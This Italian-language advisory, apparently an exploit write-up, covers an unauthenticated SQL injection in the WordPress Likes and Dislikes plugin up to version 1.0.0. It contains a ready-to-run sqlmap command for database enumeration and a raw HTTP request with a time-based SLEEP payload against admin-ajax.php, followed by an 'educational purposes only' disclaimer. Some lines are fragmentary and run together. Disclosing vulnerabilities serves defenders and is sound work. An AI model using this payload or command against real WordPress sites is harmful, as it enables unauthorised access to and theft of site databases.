
WordPress Likes and Dislikes Plugin <= 1.0.0 è vulnerabile a SQL Injection
Scoperto da: Khaled_Alenazi (Nxploited)
Pubblicato il: 27 maggio 2025
Il Plugin Likes and Dislikes per WordPress è vulnerabile a SQL Injection tramite il parametro post in tutte le versioni fino alla 1.0.0 inclusa.
A causa di un escaping insufficiente e della mancanza di prepared statements, gli attaccanti non autenticati possono iniettare SQL grezzo nelle query backend, portando a perdita o manipolazione dei dati.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
Questo comando conferma il punto di iniezione ed enumera i database utilizzando una tecnica time-based.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
Enumerazione con SQLMap:
boolean-based blind e time-based blind.db, test, information_schema.
Verifica Manuale con Burp Suite:
15 secondi, indicando una reale iniezione.
post.Questo contenuto è fornito solo a scopo educativo e di ricerca.
L'autore non approva attività dannose o lo sfruttamento di sistemi senza esplicita autorizzazione.
Khaled_Alenazi (Nxploited)